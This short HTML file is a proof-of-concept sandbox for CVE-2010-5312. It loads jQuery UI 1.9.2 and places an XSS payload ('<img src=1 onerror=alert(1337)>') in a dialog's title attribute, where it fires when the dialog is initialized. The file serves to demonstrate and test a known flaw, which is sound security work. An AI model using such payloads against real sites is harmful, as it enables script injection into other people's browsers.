index.html

<!--
    CVE Sandbox :: jQuery UI :: CVE-2010-5312
    Version: jQuery UI < 1.10.0
    ------------------------------------------------------------------------------------
    The XSS payload is injected into "title" attribute of HTML element
    Payload is executed when dialog is initialized for HTML element with payload
    ------------------------------------------------------------------------------------
    POC Author: https://twitter.com/therceman
-->

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/themes/base/jquery-ui.css">

<div id="dialog" title="<img src=1 onerror=alert(1337)>">
    <p>Dialog Content</p>
</div>

<!-- Initialization of Dialog -->

<script>
    $('#dialog').dialog();
</script>